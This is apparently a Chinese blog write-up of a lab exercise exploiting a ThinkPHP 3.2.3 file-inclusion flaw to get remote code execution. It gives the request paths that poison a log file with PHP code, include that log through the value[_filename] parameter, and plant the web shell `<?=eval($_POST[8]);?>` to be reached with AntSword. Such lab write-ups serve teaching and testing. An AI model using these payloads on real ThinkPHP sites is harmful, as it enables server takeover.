您现在的位置是:首页 > 技术教程 正文

ThinkPHP 3.2.3 RCE漏洞

admin 阅读: 2024-03-16
后台-插件-广告管理-内容页头部广告(手机)

#0x00

ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,为了简化企业级应用开发和敏捷WEB应用开发而诞生,在国内拥有庞大的用户群体,其中不乏关键基础设施用户。

ThinkPHP3.2.x 代码中如果模板赋值方法assign的第一个参数可控,可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,导致任意文件包含,可执行任意代码。

#0x01

访问靶场:nullicon-default.png?t=N7T8http://asdfasdfa.bms.aqlab.cn/

访问/index.php,burp 抓包,将路径改为/index.php?m=--><?=phpinfo();?>

访问index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_11_25.log

日志文件中包含执行代码

#0x02

修改一句话木马代码为:/index.php?m=--><?=eval($_POST[8]);?>

用蚁剑连接地址:index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_11_25.log,密码为:8

找到flag

标签:
声明

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

在线投稿:投稿 站长QQ:1888636

后台-插件-广告管理-内容页尾部广告(手机)
关注我们

扫一扫关注我们,了解最新精彩内容

搜索